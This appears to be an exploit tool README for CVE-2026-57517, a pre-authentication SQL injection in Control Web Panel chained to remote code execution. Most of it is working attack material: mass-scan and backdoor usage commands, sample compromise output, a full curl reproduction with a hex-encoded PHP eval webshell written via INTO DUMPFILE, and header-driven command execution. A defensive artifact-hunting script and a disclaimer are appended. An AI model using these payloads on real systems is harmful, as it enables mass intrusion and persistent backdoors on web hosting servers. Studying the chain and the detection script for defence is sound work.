## https://sploitus.com/exploit?id=AB794952-8E2E-55F8-97FF-1DE1AB6E3835
# Control Web Panel ≤ 0.9.8.1224: Blind SQL Injection to Remote Code Execution
Port 2083 → `userRes` POST → `INTO DUMPFILE` → Port 2031 webshell → `cwpsvc`
---
## Vulnerability Overview
**CVE-2026-57517** is a critical pre-authentication blind SQL injection in **Control Web Panel (CWP)** versions ≤ 0.9.8.1224. The `userRes` POST parameter of the user-panel endpoint (port 2083) is embedded in an SQL query without sanitization. Because the panel's queries run as the MySQL `root` account, which holds the global `FILE` privilege, an attacker can turn the injection into an arbitrary file write with `SELECT ... INTO DUMPFILE`. Two server-side conditions gate that write: `secure_file_priv` must not restrict the destination, and the directory must be writable by the `mysqld` process (the tool's `sqli_failed` result covers both a patched target and an unwritable path).
The typical exploitation chain drops a PHP webshell into the Roundcube logs directory, which is served over port 2031, and so gains remote code execution as the `cwpsvc` service account.
| Field | Detail |
|---|---|
| **CVE** | CVE-2026-57517 |
| **CVSS** | 9.8 (Critical), vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Type** | CWE-89 โ Blind SQL Injection (Pre-Auth) |
| **Affected** | Control Web Panel ≤ 0.9.8.1224 |
| **Fixed** | Version 0.9.8.1225 |
| **Disclosure** | July 1, 2026 |
| **Researcher** | Egidio Romano (Karma In Security) |
| **PoC** | Public โ [KIS-2026-12](https://karmainsecurity.com/KIS-2026-12) |
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt
```
---
## Usage
```bash
# Single target (auto-detect username)
python cve_2026_57517.py -t 192.168.1.100
# Single target with known username
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc
# Mass scan
python cve_2026_57517.py -f targets.txt -o live.txt
# Interactive shell
python cve_2026_57517.py -t target.com --rce -u cwpsvc
# Persistent backdoor (no auto-cleanup)
python cve_2026_57517.py -t target.com --no-cleanup
```
```
  -t, --target       Single target host
  -f, --file         File with targets (one per line)
  -u, --username     CWP username (skips auto-detection)
  -o, --output       Live TXT output file
      --json         JSON report file
      --threads      Concurrent workers (default: 20)
      --timeout      Request timeout seconds (default: 15)
      --no-cleanup   Leave shells on target
      --rce          Interactive shell mode
  -v, --verbose      Verbose output
```
---
## Proof of Concept
### Scenario 1: Mass Scan
```bash
$ python cve_2026_57517.py -f targets.txt -o live.txt -v
```
```
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 CVE-2026-57517 | 5 targets | 20 threads
 Cleanup: yes
 Live TXT: live.txt
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ 192.168.10.100:2083 [rce_confirmed] 18.2s
   User  : admin
   Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
   RCE   : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
           cwp-prod-01.example.com
           whoami: cwpsvc
⚠️ 192.168.10.200:2083 [sqli_failed] 12.1s
   User  : cwpsvc
   Error : SQL injection failed - target may be patched or path not writable
·  192.168.10.50:2083 [not_cwp] 2.3s
==================================================
SCAN SUMMARY
==================================================
Total       : 5
✅ RCE       : 2
⚠️ SQLi Fail : 1
?  No User   : 1
·  Not CWP   : 1
==================================================
```
### Scenario 2: Interactive Shell
```bash
$ python cve_2026_57517.py -t target.com --rce -u admin
```
```
CWP Interactive Shell โ target.com
Type 'exit' to quit, 'cleanup' to remove shell
cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
cwp$ hostname
cwp-prod-01
cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash
cwp$ exit
```
### Scenario 3: Manual Reproduction (curl)
**Step 1: Verify CWP is reachable on port 2083**
```bash
curl -sk 'https://target.com:2083/' | grep -iE 'control web panel|CWP'
```
**Step 2: Validate the username**
```bash
# The first path component is the CWP username ('admin' here);
# the tool auto-detects it unless -u is given.
curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = user exists
```
**Step 3: SQL injection via `userRes`**
The payload is a 13-column `UNION SELECT` whose second column is the PHP shell as a MySQL hex literal, written to disk with `INTO DUMPFILE`. The leading `"` closes the string literal the parameter is embedded in, the hex literal avoids any quoting inside the injected string, and the trailing `#` comments out the remainder of the original query. The destination must be writable by the `mysqld` process and permitted by `secure_file_priv`, and `INTO DUMPFILE` refuses to overwrite an existing file, so the filename must not exist yet:
```sql
" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
```
```bash
# The tool hex-encodes the shell automatically. Manual equivalent; the hex literal decodes to
#   <?php eval(base64_decode($_SERVER["HTTP_C"])); ?>
# --data-urlencode keeps the quotes, spaces and '#' intact in the form body.
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'
curl -sk 'https://target.com:2083/admin/' \
     --data-urlencode "userRes=$PAYLOAD"
```
**Step 4: Execute commands via the webshell (port 2031)**
The deployed PHP shell (the decoded hex literal from Step 3) `eval`s whatever base64-encoded PHP arrives in the `C:` request header:
```php
<?php eval(base64_decode($_SERVER["HTTP_C"])); ?>
```
```bash
# PHP to run: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
# 'aWQ=' is base64("id"); the markers delimit the command output in the response body.
PHP=$(printf '%s' "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)
curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# between the markers: uid=1001(cwpsvc) gid=1001(cwpsvc)
```
### Payload Breakdown
| Component | Value |
|---|---|
| **SQL columns** | 13-column UNION SELECT |
| **PHP shell** | `<?php eval(base64_decode($_SERVER["HTTP_C"])); ?>` |
| **Hex encoding** | MySQL `0x...` hex literal (no quotes needed inside the injected string) |
| **Write method** | `INTO DUMPFILE`: writes the single UNION row raw, with no column or line terminators, so the file reads `1<?php ... ?>345678910111213`; the stray digits sit outside the PHP tags and are harmless. Fails if the file already exists. |
| **Target path** | `/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php` (a fresh name avoids the overwrite failure; served at `https://host:2031/roundcube/logs/`) |
| **Command delivery** | HTTP header `C:` with base64-encoded PHP |
| **Command executor** | `passthru(base64_decode('{cmd}'))` between `___CMD___` markers |
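The same table read defensively. This is an added example, not part of the tool or the advisory: it hunts for the chain's artifacts on a CWP host, namely PHP files in the Roundcube logs directory (flagged by the `cwp_<uniqid>.php` naming seen in the scan output or by a body that `eval`s the `HTTP_C` header) and access-log requests for PHP under `/roundcube/logs/`, which is the only trace of the shell being driven since the `C:` header itself is never logged. The fixture directory and the three log lines are constructed; the log format is assumed to be the common format of a per-listener access log, whose real location on a CWP host this page does not give.

```python
"""Artifact hunt for this chain on a CWP host (added example, not the tool's code)."""
import os
import re
import tempfile
from typing import Dict, Iterable, List, Tuple

ROUNDCUBE_LOGS = "/usr/local/cwpsrv/var/services/roundcube/logs"  # target path from the table
SHELL_NAME_RE = re.compile(r"^cwp_[0-9a-f]{12}\.php$")              # cwp_<uniqid>.php, as in the scan output
SHELL_BODY_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*\$_SERVER\s*\[\s*["']HTTP_C["']""", re.I)
SHELL_URL_RE = re.compile(r'"(?:GET|POST) (/roundcube/logs/[^ "?]+\.php)')  # shell driven over 2031


def find_dropped_shells(logs_dir: str = ROUNDCUBE_LOGS) -> List[Tuple[str, str]]:
    """(filename, reason) for every .php file in the Roundcube logs directory.
    A log directory should hold no PHP at all, so presence alone is a finding; the
    reason records whether the name or the body also matches the known webshell."""
    findings = []
    for name in sorted(os.listdir(logs_dir)):
        if not name.lower().endswith(".php"):
            continue
        with open(os.path.join(logs_dir, name), "rb") as fh:
            head = fh.read(8192).decode("latin-1")  # latin-1 never raises on odd bytes
        if SHELL_NAME_RE.match(name):
            reason = "name-matches-cwp_<uniqid>.php"
        elif SHELL_BODY_RE.search(head):
            reason = "body-evals-HTTP_C-header"
        else:
            reason = "unexpected-php-in-logs-dir"
        findings.append((name, reason))
    return findings


def find_shell_requests(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """(client, path) for access-log requests to PHP under /roundcube/logs/.
    The 'C:' header is never logged, so the request path is the signal."""
    hits = []
    for line in lines:
        m = SHELL_URL_RE.search(line)
        if m:
            hits.append((line.split()[0], m.group(1)))
    return hits


def demo() -> Dict[str, list]:
    """Constructed fixture: a temp dir standing in for ROUNDCUBE_LOGS plus three
    common-log-format lines (assumed format; the real log location is not on the page)."""
    with tempfile.TemporaryDirectory() as d:
        # Exactly what the Step 3 DUMPFILE leaves behind, digits from the other 12 columns included.
        with open(os.path.join(d, "cwp_a3f2b9c1d8e4.php"), "w") as fh:
            fh.write('1<?php eval(base64_decode($_SERVER["HTTP_C"])); ?>345678910111213')
        with open(os.path.join(d, "errors.log"), "w") as fh:
            fh.write("[01-Jul-2026 10:00:00 +0000] PHP Warning: constructed, harmless\n")
        # Same shell renamed and re-spaced: caught by the body pattern instead of the name.
        with open(os.path.join(d, "old.php"), "w") as fh:
            fh.write('<?php eval( base64_decode( $_SERVER[ "HTTP_C" ] ) ); ?>')
        shells = find_dropped_shells(d)
    log = [
        '203.0.113.7 - - [01/Jul/2026:10:00:00 +0000] "GET /roundcube/logs/cwp_a3f2b9c1d8e4.php HTTP/1.1" 200 61',
        '198.51.100.9 - - [01/Jul/2026:10:00:05 +0000] "GET /roundcube/?_task=mail HTTP/1.1" 200 8831',
        '203.0.113.7 - - [01/Jul/2026:10:00:09 +0000] "GET /roundcube/logs/errors.log HTTP/1.1" 403 0',
    ]
    return {"shells": shells, "requests": find_shell_requests(log)}


if __name__ == "__main__":
    for key, rows in demo().items():
        print(key, rows)
```

Pointing `find_dropped_shells` at the real `ROUNDCUBE_LOGS` path on a suspect host is the quick triage; any `.php` there is worth pulling regardless of the reason label, since the `--no-cleanup` flag above leaves the shell under whatever name the operator chose.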
---
## Disclaimer
> ### FOR EDUCATIONAL & AUTHORIZED TESTING PURPOSES ONLY
>
> This software is provided **solely for educational purposes** and **legitimate security research**. It is intended to be used by:
>
> - **Security professionals** conducting authorized penetration tests
> - **Organizations** auditing their own CWP infrastructure
> - **Researchers** studying vulnerability exploitation techniques
> - **Students** learning about web application security
>
> ### You may NOT use this software to:
>
> - Access computer systems **without explicit written authorization**
> - Compromise, damage, or disrupt systems you do not **own**
> - Engage in **illegal activity** of any kind
>
> ### Legal Notice
>
> Unauthorized access to computer systems violates laws including but not limited to:
> - **United States:** Computer Fraud and Abuse Act (18 U.S.C. § 1030)
> - **Indonesia:** UU ITE Pasal 30 & 46 (UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
> - **European Union:** Directive 2013/40/EU
> - **United Kingdom:** Computer Misuse Act 1990
>
> **The author(s) assume NO LIABILITY for any misuse, damage, or legal consequences resulting from the use of this tool. By using this software, you acknowledge that you are solely responsible for your actions and agree to comply with all applicable laws.**
---
## References
| Resource | Link |
|---|---|
| Karma In Security Advisory | [KIS-2026-12](https://karmainsecurity.com/KIS-2026-12) |
| Original PoC | [CVE-2026-57517.php](https://karmainsecurity.com/pocs/CVE-2026-57517.php) |
| Full Disclosure | [SecLists](https://seclists.org/fulldisclosure/2026/Jul/9) |
| OpenCVE | [CVE-2026-57517](https://app.opencve.io/cve/CVE-2026-57517) |
| CWP Changelog | [control-webpanel.com](https://control-webpanel.com/changelog) |
---
Built for security research & education
This project is not affiliated with Control Web Panel or the Apache Software Foundation.